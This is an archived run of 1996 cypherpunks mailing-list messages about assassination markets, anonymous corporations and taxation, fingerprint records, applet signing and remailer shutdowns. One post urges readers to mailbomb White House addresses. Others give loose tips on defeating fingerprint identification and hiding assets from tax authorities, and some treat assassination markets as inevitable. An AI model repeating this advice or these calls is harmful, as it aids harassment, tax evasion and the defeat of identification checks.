send it (which anyone can spoof for free!); you can't
send to anyone in the domain of *.whitehouse.gov.

Would somebody please just mailbomb or spam
these hosers into oblivion, please?

dave

----  David Smith  Box 324  Cape Girardeau MO USA  63702
http://www.prairienet.org/~dsmith  dsmith@prairienet.org
Reality is only for those lacking in true imagination...
Send mail w/'send pgp-key' in subject for PGP public key





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 18 May 1996 19:22:44 +0800
To: Jean-Francois Avon <jf_avon@citenet.net>
Subject: RE: Why does the state still stand:
In-Reply-To: <9605152158.AA06933@cti02.citenet.net>
Message-ID: <Pine.SUN.3.93.960515183337.10635H-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996, Jean-Francois Avon wrote:

> On 15 May 96 at 17:32, Black Unicorn wrote:
> 
> > > Again, depending on the context, AP might wery well be the only
> > > solution or be no workable solution at all.
> > 
> > Now, tell me how AP is a solution if everyone in the corporation is
> > double blinded?  Who do anonymous parties put out betting pools on?
> 
> Agreed.  I just supposed there might be some of the involved entities 
> that are not totally anonymous.  I don't think that you'd deliver 
> completely anonymously a bulldozer or any other physical goods to 
> some "anonymous" address.  Somehow, if the transaction involves 
> anything physical, there is potential for a anonimity breach.

Potential, but you can manage risk with things like dead drops from
trusted parties to forwarding agents to offshore drops to....

> > Income tax and currency taxes depend on realization events.  Even in
> > the strictest sense, realization is a thin and vague concept.
> 
> Since I am not a layer, would you care to elaborate a bit more on 
> that?

Realization means that their is a changing of hands or of forms of assets.
Income tax and taxes on currency now are dependent on such transactions.
Someone already noted the problems with just taxing possession on a given
date of e.g., inventory.  To tax efficiently you have to tax an event of
transfer.

I'm not going to spend hours typing in all the kinds of realization the
U.S. system employs.

>  
> > Your only remaining option is to tax possession of currency.  Good
> > luck.
> 
> Why?  Don't they already do that through Tax on Capital?
> 

No.  The tax is a tax on Capital _Gains_.  Even this is not taxed until
the gain is "realized" (the stock sold or exchanged.. etc.)  There is an
exception for Personal Holding Companies, or Subpart F income for example,
but that's only to the extent there has still been a gain.

If you taxed currency based merely on possession, then do you just tax
on the first of every year?  That makes it so that if I have $10,000 under
my bed, I pay tax on it one year, then I pay tax on it again the next
year.  Boy, talk about an incentive not to save.  There goes the banking
industry.

> 
> > Again, who are you going to kill?
> 
> Nobody.  I thought that through you long law studies, you did learn
> to read... Or is it my english that is too imperfect?

Relax, I wasn't calling you a murderer, I was pointing out, a second time,
that in anonymous corporations there was no one to kill.  "Who are you
going to put pools on?"

> Dear Unicorn, what in the hell makes you concludes that my
> "disclaimer" means that I am going to kill somebody?  I just say that
> after having turned the idea around for some time, I see it as
> ineluctable that *some* groups will implement it.

> Just bring me
> *one* single fact of reality that will show me that it is not
> possible to implement and you will have made my day.

Give me context.  It's possible to kill the president too.  That doesn't
mean it will become the basis of government.

> Even if it is
> implemented for any entirely wrong reason, I do not think that we
> can prevent it's implementation.

That's that anonymous transactions are for.

> BTW, since I was off from CPunks for a while, would you please tell 
> me if you published the suite of you writings on assets concealement?
> I would then proceed to get it from the archives if it was published.

I forwarded two large segments of the work to the list, yes.  If you,
or anyone else on the list, would like copies, let me know.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sat, 18 May 1996 17:49:53 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Past one terabit/second on fiber
Message-ID: <199605160153.SAA05576@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:09 PM 5/15/96 EDT, E. ALLEN SMITH wrote:
>	One problem with the development of such high-end technologies is that
>they tend to increase economies of scale to the point where it's impractical to
>have anything but a monopoly or ogliopoly. As well as concerns about the degree
>of control such an organization may be able to exert in and of itself (acting
>like a government, in essence), there's also that such an organization is
>easier to pressure than a lot of small providers. Anyone have a suggested
>solution, or reasons that I shouldn't be so worried?

I think there are a number of reasons you shouldn't have to worry, at least 
about these technologies per se.  What these technologies do is dramatically 
lower the cost of supplying the service, both allowing the usual providers 
to cut prices and in fact forcing them (via the market) to do so.  Fiber, 
for example, lasts "forever," and effectively has an unlimited bandwith 
compared to most needs, which means that it has little cost other than the 
initial installation, amortized over time.

You might as well forget about this 1 Tb/s fiber, for example.  In order to 
justify such a thing, you need to have 1 Tb/s of information that you want 
to take from "here" to "there".  A city of 1 million people would have to 
have a 1 Mbit/sec/person data appetite to fill that fiber, and you'd have to 
have a huge data infrastructure just to collect all that data in the same 
place.  (Which would, in itself, require a mass of fibers of lower 
capacities.)   There would probably be no need for this, either, since the 
data would probably not all be coming from/going to the same location.  
Probably the only place where 1 Tb/s fiber will be needed in the next 20+ 
years is undersea links, and even that is questionable.

There's also the "all the eggs in one basket" problem.  Send your data on 
12, 80 Gb/s fibers and you have substantial redundancy.  Send it on one 
fiber and you're more subject to downtime due to individual component failure.

Secondly, fiber can be upgraded in an exceedingly economical, though 
granular way.  As I observed a few years ago, a given cable way initially 
had only a single cable installed though it had capacity for three.  And 
some of the fibers installed were probably not used immediately, due to lack 
of need.  Finally, the fiber was probably only driven initially at a 
comparatively low speed (maybe 400 megabits/s, for example) but could have 
been later upgraded to 2.5 Gb/s, or perhaps even higher.  Upgrading under 
those conditions is extremely cheap.

The main thing we need to worry about is allowing those people with the 
fiber to exert influence over us to an extent greater than the cost of 
supplying that data-transmission service would reasonably allow.  (The nosy 
landlord problem.)  Ideally, they'd provide the fiber, we'd pay for it at a 
reasonable rate, and they'd be satisfied.  The alternative, a busybody 
policy, is only practical to force on customers when the product being 
supplied is supply-limited.  Since fiber cost is dropping like a rock, and 
capacity will outstrip demand for the forseeable future, there is no reason 
we should be limited to deal with only one organization.

Jim Bell
jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sat, 18 May 1996 04:05:08 +0800
To: Vipul Ved Prakash <vipul@pobox.com>
Subject: Re: Securing CDROM from piracy
In-Reply-To: <199605142323.EAA00118@fountainhead.net>
Message-ID: <199605152256.SAA03246@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Vipul Ved Prakash writes:
> We have developed a multimedia resource that will be cut on a CD-ROM for
> retailling. Since we don't have our own distributers newtwork we will be
> collobarating with another firm for distribution. Is there any way of making
> sure that the guy doesnt pull a fast on on us? Can we ensure that he cannot 
> duplicate the thing and start selling it without sharing the profit.

Since he can read the CD, he can duplicate it.

I will point out anyone buying a CD can do the same thing.

> Or alternatively is there any protocol we could follow that will
> ensure a fair game?

I can't think of how...

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Mark M." <markm@voicenet.com>
Date: Sat, 18 May 1996 12:34:06 +0800
To: cypherpunks@toad.com
Subject: RE: Why does the state still stand:
In-Reply-To: <01BB41E0.DE17C4C0@blancw.accessone.com>
Message-ID: <Pine.LNX.3.93.960515185548.587A-100000@gak>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 14 May 1996, blanc wrote:

> .  What if someone, hired on one occasion but fired at another, decides in
> anger to "turn coat" and report everyone to the IRS (or other fine government
> agency)?

In this scheme, all employees are pseudonymous so a disgruntled worker would
have nothing to report.

> 
> .  What if a company does not pay as expected - other than adopting
> Assassination Politics, what method could an employee use towards getting
> their expected remuneration for work done?

A company could not afford to have such a loss of reputation.  Nobody is going
to work for a company that doesn't pay its employees.

> 
> .  Wouldn't everyone need to have two jobs (or source of regularly
> accepted cash), in order to be able to pay for services where suppliers do
> not accept virtual cash transactions? (TCM has mentioned before about the
> need to pay for some things in tiny quantities - like quarters for a phone
> call, etc.)

I think that this could be solved by having services which could exchange
ecash for real cash and real cash to ecash.  Also, such a system could be
used for fully anonymous ecash -- sort of like a remailer for virtual money.

- -- Mark

=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
markm@voicenet.com              | finger -l for PGP key 0xe3bf2169
http://www.voicenet.com/~markm/ | d61734f2800486ae6f79bfeb70f95348
((2b) || !(2b))                 | Old key now used only for signatures
"The concept of normalcy is just a conspiracy of the majority" -me


-----BEGIN PGP SIGNATURE-----
Version: 2.6.3
Charset: noconv

iQCVAwUBMZpiUrZc+sv5siulAQEiYwP9HnvfuWNRPjsGgr1oron+OBOJS8R0CUnj
aopJ22OjkE4RdWPKjb21heLkuAYY1pFoYG+k571cGvxYCLPqAKX+rx++BWvdkmGr
q0qSEmpDtkkR8qdaWm3XWT83iQrxig/HzVkzQ2Bvgj1a6f/r83y1rhp3aCAcD89p
nifimeB7jTc=
=uUOR
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 18 May 1996 09:47:52 +0800
To: jimbell@pacifier.com
Subject: Re: Past one terabit/second on fiber
Message-ID: <01I4QUMJPK468Y5E90@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


	One problem with the development of such high-end technologies is that
they tend to increase economies of scale to the point where it's impractical to
have anything but a monopoly or ogliopoly. As well as concerns about the degree
of control such an organization may be able to exert in and of itself (acting
like a government, in essence), there's also that such an organization is
easier to pressure than a lot of small providers. Anyone have a suggested
solution, or reasons that I shouldn't be so worried?
	-Allen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sat, 18 May 1996 12:02:34 +0800
To: cypherpunks@toad.com
Subject: Re: Why does the state still stand:
Message-ID: <9605160024.AA14298@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On 15 May 96 at 15:48, jim bell wrote:

> I understand your...uh...caution.  But as scary as it may be to
> "us," it's going to be even more terrifying to those it is likely to
> eliminate.  Sort of the difference between two parachute jumps: With
> and without a parachute!

Mr Bell.

Please do not refer to me as being part of what you call "us".
The fact that I exchanged on the topic of AP, and more particularly on
its intrinsical workings and logic does not mean that I endorse nor
like it.  Please read what I wrote and stick to it.

Respectfully.

JFA


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQEVAwUBMZohdsiycyXFit0NAQE8HQgAj0YvSDLxlWVKiDVcHfMHRerNwNEc3qxa
hu5GAqlyvHF493AGpahgtCnzj3qcvcJjqqp+AR1QLGeGhn6+CjxFpv5E3iEjNGb3
NXKc4Mk11m/bEeZF6xoK/1R+tXLzYoXvKS43s69tu7y7fY7jg/q+fIkUWAin2KqV
u03iXapqndBT4lvr2HHYtzkHJosH7DFfvFDGpWhHNW6p/aEM8EjJdGKmNgQFB+QG
0cV3Chsdb6jjQui9OyfeYkn9IvsgbQk+4l0LhfMu8+XcNQ2jSQdXgoGGXqH67lJJ
/ai49LqVXbT1tAePjziud5l8KG5+V4oFqLKRP/g7MgRRPxdAPtGrgQ==
=z3tY
-----END PGP SIGNATURE-----

 DePompadour, Societe d'Importation Ltee  
 Limoges porcelain, Silverware and mouth blown crystal glasses

 JFA Technologies, R&D consultants.
 Physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Jean-Francois Avon" <jf_avon@citenet.net>
Date: Sun, 19 May 1996 00:17:27 +0800
To: cypherpunks@toad.com
Subject: RE: Why does the state still stand:
Message-ID: <9605160023.AA14246@cti02.citenet.net>
MIME-Version: 1.0
Content-Type: text/plain


On 15 May 96 at 18:42, Black Unicorn wrote:

> Potential, but you can manage risk with things like dead drops from
> trusted parties to forwarding agents to offshore drops to....

I can just visualize a trusted party dropping discretely a bright
yellow Caterpillar D-12 in a dead letter box... ROTFL!

Sorry, but I couldn't resist.  I just *love* silly humor...

> Realization means that their is a changing of hands or of forms of
> assets. Income tax and taxes on currency now are dependent on such
> transactions. Someone already noted the problems with just taxing
> possession on a given date of e.g., inventory.  To tax efficiently
> you have to tax an event of transfer.

Why? is it because of the nature of a transfer, it lend itself more 
to reporting and detecting?  Or is it simply because of the legal 
system structure?


> Give me context.  It's possible to kill the president too.  That >
doesn't mean it will become the basis of government.

I think that Mr. Bell defined the context quite well and thoroughly.
And, as he said, the president is unlikely to be the target of
choice because it is not the most efficient one.  Who cares about the 
president?  Who is he without the govt machine?

> That's that anonymous transactions are for. 

If anonymous transactions are feasible, so will be the AP scheme...
AP can be, in a way, characterized as a weapon because it behaves
like one.  And no weapon in the history of humanity remained unused. 

 
> I forwarded two large segments of the work to the list, yes.  If
> you, or anyone else on the list, would like copies, let me know.

Theses were the first two that constitued part 1 of 4.  I wondered if 
you posted the other parts.  If so, tell me so I can get to the 
archives.

Regards.

JFA

 DePompadour, Societe d'Importation Ltee  
 Limoges porcelain, Silverware and mouth blown crystal glasses

 JFA Technologies, R&D consultants.
 Physists, technologists and engineers.

 PGP keys at: http://w3.citenet.net/users/jf_avon
 ID# C58ADD0D : 529645E8205A8A5E F87CC86FAEFEF891 
 
 Unsollicited commercial e-mail will be proofread at US165 $/h
 Any sender of such material will be considered as to have ac-
 cepted the above mentionned terms.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 18 May 1996 04:36:55 +0800
To: jf_avon@citenet.net
Subject: Re: Why does the state still stand:
Message-ID: <01I4QV7ROZKG8Y5E90@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"jf_avon@citenet.net" 15-MAY-1996 19:11:14.65

>But here, I think that AP would be the single most important factor
>ruling the socio-economical behavior of individuals or entities in
>the world.  It already works that way in many countries of the
>world, especially in south america.  In many places, you don't screw
>around too much or you get killed.  As a friend of mine who lived in
>the jungle told me "if a guy fools around with you wife, you just
>shut up and take it, but if a guy fools around with your girlfriend,
>you have the sorcerer mix you a beverage...  One of my friend had
>one and he died within ten days..."

	However, this is depending on being able to target the people involved.
Anonymnity kind of prevents that, if it's enough to avoid governmental
intervention.
	-Allen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 18 May 1996 04:45:36 +0800
To: unicorn@schloss.li
Subject: Re: Fingerprinting annoyance
Message-ID: <01I4QVHPIRS68Y5E90@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 15-MAY-1996 00:00:25.51
>On Tue, 14 May 1996, Timothy C. May wrote:

>> At 3:22 PM 5/14/96, Matthew Williams wrote:
>> >Although knowingly providing a fake social security number when one
>> >has any expectation of gain is, I believe, a felony.

>> >42 USC. sec. 408.

>Note the key provisons, for gain, and when submitted to those entitled to
>the number legally.

	But is "entitled to the number legally" meaning anyone who _must_
have the number legally (IRS & other government agencies, those dealing with
the IRS, etcetera), or anyone who can require it as a condition of doing
business? There is a difference between the two, at least according to the
Social Security Number FAQ that I last read.
	-Allen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 18 May 1996 18:40:24 +0800
To: "Paul S. Penrod" <furballs@netcom.com>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <Pine.3.89.9605151210.A27377-0100000@netcom6>
Message-ID: <Pine.SUN.3.93.960515192152.10635K-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996, Paul S. Penrod wrote:

> 
> 
> On Tue, 14 May 1996, Black Unicorn wrote:
> 
> > On Mon, 13 May 1996, Paul S. Penrod wrote:

[...]

> > > First off, if you were born in the US, they have your feet and/or hand 
> > > prints on record.
> > 
> > Incorrect.
> > Several states do not bother to print infants at birth.
> > Several hospitals do not bother to follow state guidelines in those states
> > which do so require.
> 
> Which ones specifically?

Illinois doesn't much care.  Michigan had no requirement at all, some
hospitals did, some didn't bother to print infants at birth.  This was
usually to avoid baby switching and such and records were dumped later on.
Wisc. never much seemed to care until about 5 years ago when someone tried
to pass a law.  I don't think it ever passed, but I'm not sure.  There is
no standard consensus on this.

In Illinois it was estimated last year that 9% of births were outside of
hospitals.

Thousands if not millions of people have no prints on record.  How large
precisely do you think the FBI's national records are?  FBI + Local law
enforcement?  FBI + Local + administrative?

I'd be very surprised to find out it was larger than 100 million, or ~1/3
of the U.S. population (any number of which might be records of dead
people).

> > It is one of the great advantages of the United States that no
> > standardized procedure for person identification exists.  Seals and
> > certificates vary from jurisdiction to jurisdiction.  Cross the border to
> > a state and a hospital birth annoucement is enough for a drivers license,
> > cross again and 4 pieces and a note from mom isn't enough.
> > 
> > Be careful with disinformation please.
> > 
> 
> My point is not about the variance of seals and certificates (I have at 
> least 6 different ones prove it from 4 different states). That is a 
> given. It is that prints have been a generally accepted practice for some 
> time now. IF you want to make the case and go back to the early days 
> (pre-WWII), then people like attila and a few others don't have them - 
> and I'll concede the point on that basis.

Again, the point is that states can't decide if they want the task of
printing and sorting and collecting and storing such records.  It's not
cheap.  Even if it were, some states just don't care.

If you're trying to tell me that few if any unsolved cases involving
"unmatched" prints were committed by people younger than 55-60, I think
you might reconsider.  That's what your "everyone since WWII" statement
implies.  If that is so, why does the FBI maintain thousands of active
"waiting for print-person link" records for unsolved cases?

Either 1. - Not everyone born is printed or 2. - Hospitals who print don't
bother to submit to state or federal agencies because they (a) are not
required to (b) don't much care.

The answer is actually (3) all of the above.

> The information I received has come from inquiries to folks I know within 
> the AMA, several different hospital adminstration staff in various states 
> - whose job it is to handle such affairs, and few other people who make 
> it their business to know such trivia. IF the information is in error, 
> I'll gladly accept correct input. Next time, don't be so quick to accuse 
> without inquirying to context. I'm not J.Bell.

Again, even what the AMA says has little to do with state and individual
hospital practice.  Of the printing that goes on, most infant
identification is done for internal hospital records, and most involves
ONLY foot prints.

> ...Paul
> 

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 18 May 1996 12:38:50 +0800
To: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <01I4QVHPIRS68Y5E90@mbcl.rutgers.edu>
Message-ID: <Pine.SUN.3.93.960515193813.10635L-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996, E. ALLEN SMITH wrote:

> From:	IN%"unicorn@schloss.li"  "Black Unicorn" 15-MAY-1996 00:00:25.51
> >On Tue, 14 May 1996, Timothy C. May wrote:
> 
> >> At 3:22 PM 5/14/96, Matthew Williams wrote:
> >> >Although knowingly providing a fake social security number when one
> >> >has any expectation of gain is, I believe, a felony.
> 
> >> >42 USC. sec. 408.
> 
> >Note the key provisons, for gain, and when submitted to those entitled to
> >the number legally.
> 
> 	But is "entitled to the number legally" meaning anyone who _must_
> have the number legally (IRS & other government agencies, those dealing with
> the IRS, etcetera), or anyone who can require it as a condition of doing
> business? There is a difference between the two, at least according to the
> Social Security Number FAQ that I last read.
> 	-Allen


It means essentially the IRS and banks.  Even banks have little recourse.
They make you sign a piece of paper that says you gave them the right SSN,
but practically speaking no one cares.

Equifax (a credit reporting agency) refuses to take bank records as
evidence of SSN's because they KNOW the banks don't care or enforce and
that people lie to or make mistakes to the bank on a daily basis.

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 18 May 1996 18:29:48 +0800
To: "Paul S. Penrod" <furballs@netcom.com>
Subject: Re: Fingerprinting annoyance
In-Reply-To: <Pine.3.89.9605151204.A27377-0100000@netcom6>
Message-ID: <Pine.SUN.3.93.960515194016.10635M-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 15 May 1996, Paul S. Penrod wrote:
> On Tue, 14 May 1996, Black Unicorn wrote:
> > Paul S. Penrod wrote:

> > > I know of no such instance (other than some informal "fingerprint the 
> > > kiddies for safety" schtick) where it's a do-it--yourself operation. 
> > 
> > Not _technically_ perhaps.  But in most cases it's a
> > go-down-to-the-police-station-and-have-them-sign-the-card operation.  Who
> > is it that can tell a random signature from a police signature exactly?
> > Like I said, standard print cards are available at the GPO.
> 
> Thats fine, but tell me it's going to play at the clearance level...It 
> won't.

Agreed.  I never claimed this.

> > > Doesn't always work. Partials can be extrapolated to yield a
> > > relative match.
> > 
> > Depends on what you are looking to do.  If your goal is to deter random
> > searching through a national database, mutilation will probably be very
> > effective.  If they have the prints of the murderer (you) and you're a
> > suspect, mutilation aside from actually removing the fingers isn't going
> > to do anything.
> 
> If there is a serious crime involved, partials are sufficient to make the 
> "guest list" if there are other mitigating factors to even suspect you 
> might be involved. That's doesn't mean you'll make it to the top, but it 
> can certainly cause some painful scrutiny.

Again, it depends on the degree of "mutilation."  Distortion of major
features is fairly effective even against partial attempts which are
matched by computer.

[Laytex]

> > > Wont work. The hands are checked first for signs of tampering.
> > 
> > See above about tech end around.
> 
> Again, process will work, but not allowed in context of clearance.

Concur.

> Scraping the fingertips runs the risk of leaving trace marks that are 
> just as good as the ridges you tried to remove - even better if you've 
> left finger prints as a result. The point to the game is not to search 
> any database, but to produce a verifiable match with evidence at the 
> scene of any crime. In the case of a clearance, it is to start or 
> validate an identification process. IF validation is unobtainable via 
> fingerprints, then the issuing body can employ other means (such as 
> retinal scans) or deny clearance all together.

Careful.  Even Central Intelligence Agency print requirements are for
criminal background check only.  They will run through FBI files and so
forth and keep the prints for their records, but they are rarely if ever
used as identification verification per se.

This is because not everyone in the world has fingerprint files floating
around.  If you are getting printed for the first time ever and you
distory or mutilate, there's nothing to compare to.  Further, if you just
distort, you're prints later might not match well when computer searches a
nationwide database (which excludes CIA employees in any event).

It's all about application.

To repeat, if you're looking to "estlablish" a false print index,
distortion is a good way to do it.

If you're looking to evade a search which has already narrowed you down
well, hack off some fingers.

> ...Paul

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 18 May 1996 17:50:18 +0800
To: Cypherpunks@toad.com
Subject: Re: Java & signed applets
Message-ID: <adbfe806030210047b41@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 3:02 PM 5/16/96, Lyal Collins wrote:
>Signing anything is somewaht a waste of time, unless the verification
>siftware is highly trusted, and there is good intergity/authenticity
>control of the root public key(s).
>So, in geneal - ho hum - until trusted hardware is available on the
>desktop.

Unless I am misunderstanding your message (terseness has its
disadvantages), this is not really true.

* Checking the signature on a signed applet is a kind of "sanity check" on
the source of the software. It is rather unlikely, I think, that a
malicious agent will corrupt or infect one's verification software so as to
make untrusted applets looks trusted. (Ignoring what "trust" means for
now.)

* To wit, if you (Lyal Collins) run a signature verification applet
downloaded, say, from Sun, and some time has passed and you have heard no
reports that, say, Silicon Graphics broke into Sun and replaced all of
Sun't applets with a malicious version, and if you have checked Sun's
signature against published values (that is, you have used a public key
widely disseminated, and not repudiated), then you can very probably
"trust" this signature-checking procedure.

(One can construct fanciful scenarios in which one's OS has been corrupted,
one's microprocessor has been replaced, etc., but these are clearly fringe
events. All security is economics....)

(Note: I expect at least one person to argue that this is indeed a concern.
Again, look to economics. How do you _really_ know that your "mother" is
really your mother, and not a stranger who entered your life minutes after
your birth? How do you _really_ know that a vending machine of Cokes is not
able to detect your presence and give you a poisoned can of Coke?)

* If one's basic signature-checking hardware and software is not
compromised, signature checking works. If it _is_ compromised, you've got
bigger problems. And no cryptographic system can really handle this issue.

Oh, and I disagree also with the last point: "So, in geneal - ho hum -
until trusted hardware is available on the desktop."

What, for example, is "trusted hardware"? How does a user ever know that
his hardware was not compromised at the chip factory, for example?

(Not that I think this is a reasonable thing to worry about at this point,
given much larger problems all around us, but I mention it to show that one
gets caught in a recursive process in which one can of course never be
absolutely certain of anything. The Solipsist view of things is internally
consistent.)

So, I'll take my chances that applet signing will be a welcome extra level
of protection against malicious applets. Others are free, of course, to
instead worry that their machines are insecure and the signature-checking
software has cleverly been replaced by some agent trying to get them to
download a malicious applet. (Of course, if They can corrupt one's crypto
software, they can do all sorts of other bad things, and probably don't
need to wait for you to download an applet to start doing them.)

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Rosoff <drosoff@arc.unm.edu>
Date: Sun, 19 May 1996 05:37:34 +0800
To: cypherpunks@toad.com
Subject: Why is hacktic going down?
Message-ID: <199605160225.UAA27876@laguna.arc.unm.edu>
MIME-Version: 1.0
Content-Type: text/plain


Does anyone know the reasons for the shutting down of the hacktic remailer?

And also, are the other remailers at utopia.hacktic.nl going down with the
remailer at remailer@utopia.hacktic.nl?

Thanks

David






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 18 May 1996 04:37:48 +0800
To: frantz@netcom.com
Subject: Re: crosspost re remailers
Message-ID: <01I4QXEEYGLS8Y5F2B@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"frantz@netcom.com" 15-MAY-1996 18:54:28.83

>I thought the statement that remailers are supposed to be ephemeral and
>common was the answer.  If one is shut down, a dozen spring up in its
>place.  Advertising new remailers does become an issue.  What mechanisms
>are in place for new remailers to advertise themselves?

	Emailing to Raph Levien (sp?) would seem to be the current way to do
it, as well as announcements on cypherpunks. If we do get increased remailer
turnover, Raph's increasing the frequency of such postings (possibly with
moving the increased-frequency ones to a dedicated mailing list for the
subject) would be advisable.

>I find it interesting that this remailer is being shut down by private
>action and not by government.  (Yes, they are threatening government
>action, but if they couldn't do that they would find some other threat.)

	It does look like governments really haven't noticed remailers much,
at least publically. I'm sure the NSA, etcetera know about them, but I would
guess they see no reason to give remailers publicity.
	-Allen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "E. ALLEN SMITH" <EALLENSMITH@ocelot.Rutgers.EDU>
Date: Sat, 18 May 1996 04:21:38 +0800
To: unicorn@schloss.li
Subject: Re: Why does the state still stand:
Message-ID: <01I4QXLS5GQE8Y5F2B@mbcl.rutgers.edu>
MIME-Version: 1.0
Content-Type: text/plain


From:	IN%"unicorn@schloss.li"  "Black Unicorn" 15-MAY-1996 18:59:01.44

>For these a company running at a constant net operating loss could be
>formed to purchase cars for resale (funny how no one ever buys them) and
>manage property (which no one seems to ever lease).

	But won't such a company run into tax problems? In other words, the
IRS is going to look with some suspicion on a company that keeps showing no
profits (and thus no taxes) but keeps going anyway. They're going to think that
the owners are making a profit anyway but concealing it - which is the case.
I'm not sure how to handle this one, other than not owning major property
(rental et al).
	-Allen





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sat, 18 May 1996 17:58:02 +0800
To: cypherpunks@toad.com
Subject: The Crisis with Remailers
Message-ID: <adbfebe7040210046482@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:29 PM 5/15/96, jamesd@echeque.com wrote:

>Some nyms are valuable, most are valueless by design.  All remailers
>should be valueless by design.  The penet.fi remailer design is
>unsatisfactory precisely because it penet.fi is valuable, hence a
>target.  If it gets shut down a lot of people lose their nyms,
>causing much inconvenience.

I agree with this point, and the similar points made by Hal Finney and by
several others.

We have far too few remailers, they are too tempting as targets, the use of
"mail-to-News" gateways is formally separable from the function as a
remailer, and there is generally a stagnation in the deployment of new and
varied kinds of remailers and their modes of operation.

We used to discuss remailer architecture, topology, functionality, and
"ideal behavior" quite a bit a few years ago, but seldom do here on the
Cypherpunks list anymore. Various reasons: same old discussions,
commercialization of Mixmaster-type remailers (so I hear, and Lance
